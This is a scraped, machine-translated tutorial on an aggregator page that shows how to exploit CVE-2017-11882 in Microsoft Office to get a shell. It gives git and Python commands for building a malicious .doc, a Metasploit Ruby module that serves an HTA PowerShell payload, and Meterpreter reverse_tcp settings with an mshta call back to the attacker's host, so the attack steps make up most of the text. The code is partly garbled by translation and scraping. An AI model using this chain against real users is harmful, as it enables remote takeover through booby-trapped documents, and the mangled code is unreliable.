Office exploit-Get shell

Source: Internet
Author: User
Tags git clone cve

Environment:

Kali system, Windows system

Process:

In the Kali system generated by the use of files, Kali system listening to the local port, Windows system open DOC file, you can recruit

  

The first method of use, suitable for testing:

Download code from git:

git clone https://github.com/ridter/cve-2017-11882

Execute the following code to generate a doc in the current directory:

Python command_cve--11882"cmd.exe/c calc.exe" -o Test.doc

Generates a Test.doc file, and if a vulnerable computer opens the file, a calculator will pop up;

The second way to use the rebound is to get the shell:

Kali System Preparation:

Copy the following Ruby code to /usr/share/metasploit-framework/modules/exploits/windows/smb/cve_2017_11882.rb Directory (note the code indentation OH):

# # # This module requires metasploit:https://metasploit.com/download# current source:https://github.com/rapid7/ metasploit-framework## class Metasploitmodule < Msf::exploit::remote Rank = normalranking include Msf::exploit::re Mote::httpserver def initialize (info = {}) Super (Update_info (info, ' Name ' = ' Microsoft Office Payload deliv Ery ', ' Description ' =%q{This module generates an command to place within a Word document, that WH En executed, would retrieve a HTA payload via HTTP from a Web server.      Currently has not figured off how to generate a doc.        }, ' License ' = + msf_license, ' Arch ' = arch_x86, ' Platform ' = ' win ', ' Targets ' [[' Automatic ', {}],], ' defaulttarget ' = 0,) ' End def On_request_uri (CLI, _request) p Rint_status ("Delivering payload") P = regenerate_payload (CLI) data = MSF::UTIL::EXE.TO_EXECUTABLE_FMT (framewor K, Arch_X86, ' win ', p.encoded, ' Hta-psh ', {: Arch = arch_x86,:p latform = ' Win '}) send_respons E (CLI, data, ' content-type ' = ' Application/hta ') end def primer url = Get_uri print_status ("Place the follow ing DDE in an MS document: ") print_line (" Mshta.exe \ "#{url}\" ") endend

To start the MSF service on the command line:

Service PostgreSQL Start

Start MSF again:

sudo msfconsole

Reload All modules:

Reload_all

Find the cve_2017_11882 module we just created:

Search cve_2017_11882

Load this module:

Using Bounce Shellcode, configure the native address, configure the URI address

set payload windows/meterpreter/reverse_tcpset192.168. 0.105 Set Uripath Aaaaexploit

Generating exploit files Test1.doc

The implementation uses Ifconfig to find the current computer IP, and then executes the following command under Clone down project, the current system generates a Test1.doc file:

Python command109b_cve--11882"mshta http://192.168.0.108/aaaa" - o Test1.doc

(Note that the name AAAA is the same as the MSF Uripath and cannot be scrambled)

By placing the generated Test1.doc in the window system, MSF returns a shell

Related resources:

POC Project address: https://github.com/Ridter/CVE-2017-11882/

 python command_cve- 2017  - 11882.  PY - C  cmd.exe/c calc.exe "  - o test.doc 

NONO
Source: http://www.cnblogs.com/diligenceday/
Enterprise Website: http://www.idrwl.com/
Open Source Blog: Http://www.github.com/sqqihao
QQ: 287101329
: 18101055830

Office exploit-Get shell

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.